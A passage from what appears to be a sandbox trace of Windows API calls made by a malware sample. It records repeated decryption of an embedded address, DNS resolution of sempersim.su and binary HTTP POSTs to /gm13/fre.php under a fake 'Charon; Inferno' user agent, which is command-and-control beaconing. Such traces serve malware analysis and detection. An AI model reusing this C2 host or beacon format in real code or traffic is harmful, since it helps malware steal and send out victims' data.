[0155.069] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0155.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.070] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0155.070] GetProcessHeap () returned 0x620000 [0155.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0155.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0155.071] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0155.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0155.072] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0155.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0155.108] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0155.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0155.109] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0155.109] GetProcessHeap () returned 0x620000 [0155.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0155.109] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0155.109] GetProcessHeap () returned 0x620000 [0155.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0155.110] GetProcessHeap () returned 0x620000 [0155.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0155.110] GetProcessHeap () returned 0x620000 [0155.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0155.110] GetProcessHeap () returned 0x620000 [0155.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643560 [0155.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.111] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0155.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.117] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0155.126] GetProcessHeap () returned 0x620000 [0155.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0155.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.127] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0155.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.130] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0155.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.130] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0155.130] GetProcessHeap () returned 0x620000 [0155.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0155.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.132] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643560, pdwDataLen=0x19fcfc | out: pbData=0x643560, pdwDataLen=0x19fcfc) returned 1 [0155.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.133] CryptDestroyKey (hKey=0x62d190) returned 1 [0155.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.134] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0155.134] GetProcessHeap () returned 0x620000 [0155.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0155.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0155.135] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0155.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0155.136] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0155.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0155.140] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0155.140] GetProcessHeap () returned 0x620000 [0155.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0155.140] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6441e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0155.141] GetProcessHeap () returned 0x620000 [0155.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b620 [0155.141] socket (af=2, type=1, protocol=6) returned 0x300 [0155.142] connect (s=0x300, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0155.190] FreeAddrInfoW (pAddrInfo=0x6441e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0155.190] GetProcessHeap () returned 0x620000 [0155.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0155.191] GetProcessHeap () returned 0x620000 [0155.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0155.191] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0155.192] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0155.192] GetProcessHeap () returned 0x620000 [0155.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0155.192] GetProcessHeap () returned 0x620000 [0155.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0155.193] GetProcessHeap () returned 0x620000 [0155.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643638 [0155.193] GetProcessHeap () returned 0x620000 [0155.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0155.194] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0155.194] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0155.194] GetProcessHeap () returned 0x620000 [0155.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0155.195] GetProcessHeap () returned 0x620000 [0155.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0155.195] send (s=0x300, buf=0x63a880*, len=237, flags=0) returned 237 [0155.196] send (s=0x300, buf=0x6421e0*, len=159, flags=0) returned 159 [0155.196] GetProcessHeap () returned 0x620000 [0155.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0155.196] recv (in: s=0x300, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0156.950] GetProcessHeap () returned 0x620000 [0156.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0156.950] GetProcessHeap () returned 0x620000 [0156.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0156.951] GetProcessHeap () returned 0x620000 [0156.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0156.951] GetProcessHeap () returned 0x620000 [0156.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0156.952] closesocket (s=0x300) returned 0 [0156.952] GetProcessHeap () returned 0x620000 [0156.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b620 | out: hHeap=0x620000) returned 1 [0156.953] GetProcessHeap () returned 0x620000 [0156.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0156.953] GetProcessHeap () returned 0x620000 [0156.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0156.953] GetProcessHeap () returned 0x620000 [0156.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0156.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x132c) returned 0x300 [0156.955] Sleep (dwMilliseconds=0xea60) [0156.963] GetProcessHeap () returned 0x620000 [0156.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0156.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0156.965] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0156.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0156.971] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0156.978] GetProcessHeap () returned 0x620000 [0156.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0156.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0156.984] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0156.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0156.985] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0156.987] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.987] GetProcessHeap () returned 0x620000 [0156.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0156.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0156.988] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0156.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0156.989] CryptDestroyKey (hKey=0x62d710) returned 1 [0156.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0156.990] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0156.990] GetProcessHeap () returned 0x620000 [0156.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0156.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0156.991] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0156.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0156.992] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0156.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0156.993] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0156.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0156.994] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0156.994] GetProcessHeap () returned 0x620000 [0156.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0156.994] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0156.994] GetProcessHeap () returned 0x620000 [0156.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0156.995] GetProcessHeap () returned 0x620000 [0156.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0156.996] GetProcessHeap () returned 0x620000 [0156.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0157.000] GetProcessHeap () returned 0x620000 [0157.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0157.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0157.001] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0157.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0157.010] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0157.017] GetProcessHeap () returned 0x620000 [0157.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0157.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0157.018] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0157.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0157.019] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0157.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0157.020] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0157.020] GetProcessHeap () returned 0x620000 [0157.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0157.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0157.021] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0157.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0157.022] CryptDestroyKey (hKey=0x62d710) returned 1 [0157.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0157.022] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0157.022] GetProcessHeap () returned 0x620000 [0157.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0157.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0157.023] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0157.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0157.024] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0157.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0157.025] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0157.025] GetProcessHeap () returned 0x620000 [0157.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0157.025] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6440a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebb0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0157.028] GetProcessHeap () returned 0x620000 [0157.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0157.028] socket (af=2, type=1, protocol=6) returned 0x304 [0157.029] connect (s=0x304, name=0x63ebb0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0157.082] FreeAddrInfoW (pAddrInfo=0x6440a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebb0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0157.082] GetProcessHeap () returned 0x620000 [0157.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0157.082] GetProcessHeap () returned 0x620000 [0157.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0157.083] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0157.084] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0157.084] GetProcessHeap () returned 0x620000 [0157.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0157.084] GetProcessHeap () returned 0x620000 [0157.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0157.085] GetProcessHeap () returned 0x620000 [0157.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643200 [0157.085] GetProcessHeap () returned 0x620000 [0157.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0157.086] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0157.086] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0157.086] GetProcessHeap () returned 0x620000 [0157.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0157.086] GetProcessHeap () returned 0x620000 [0157.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0157.087] send (s=0x304, buf=0x63a880*, len=237, flags=0) returned 237 [0157.097] send (s=0x304, buf=0x6421e0*, len=159, flags=0) returned 159 [0157.097] GetProcessHeap () returned 0x620000 [0157.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0157.098] recv (in: s=0x304, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0159.188] GetProcessHeap () returned 0x620000 [0159.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0159.189] GetProcessHeap () returned 0x620000 [0159.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0159.189] GetProcessHeap () returned 0x620000 [0159.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0159.189] GetProcessHeap () returned 0x620000 [0159.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0159.190] closesocket (s=0x304) returned 0 [0159.190] GetProcessHeap () returned 0x620000 [0159.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0159.190] GetProcessHeap () returned 0x620000 [0159.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0159.191] GetProcessHeap () returned 0x620000 [0159.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0159.191] GetProcessHeap () returned 0x620000 [0159.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0159.192] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1210) returned 0x304 [0159.193] Sleep (dwMilliseconds=0xea60) [0159.199] GetProcessHeap () returned 0x620000 [0159.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0159.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.201] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0159.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.210] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0159.220] GetProcessHeap () returned 0x620000 [0159.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0159.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.221] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0159.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.222] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0159.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.223] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0159.223] GetProcessHeap () returned 0x620000 [0159.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0159.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.224] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0159.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.225] CryptDestroyKey (hKey=0x62d710) returned 1 [0159.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.226] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0159.226] GetProcessHeap () returned 0x620000 [0159.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0159.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0159.226] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0159.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0159.227] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0159.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0159.228] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0159.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0159.233] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0159.233] GetProcessHeap () returned 0x620000 [0159.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 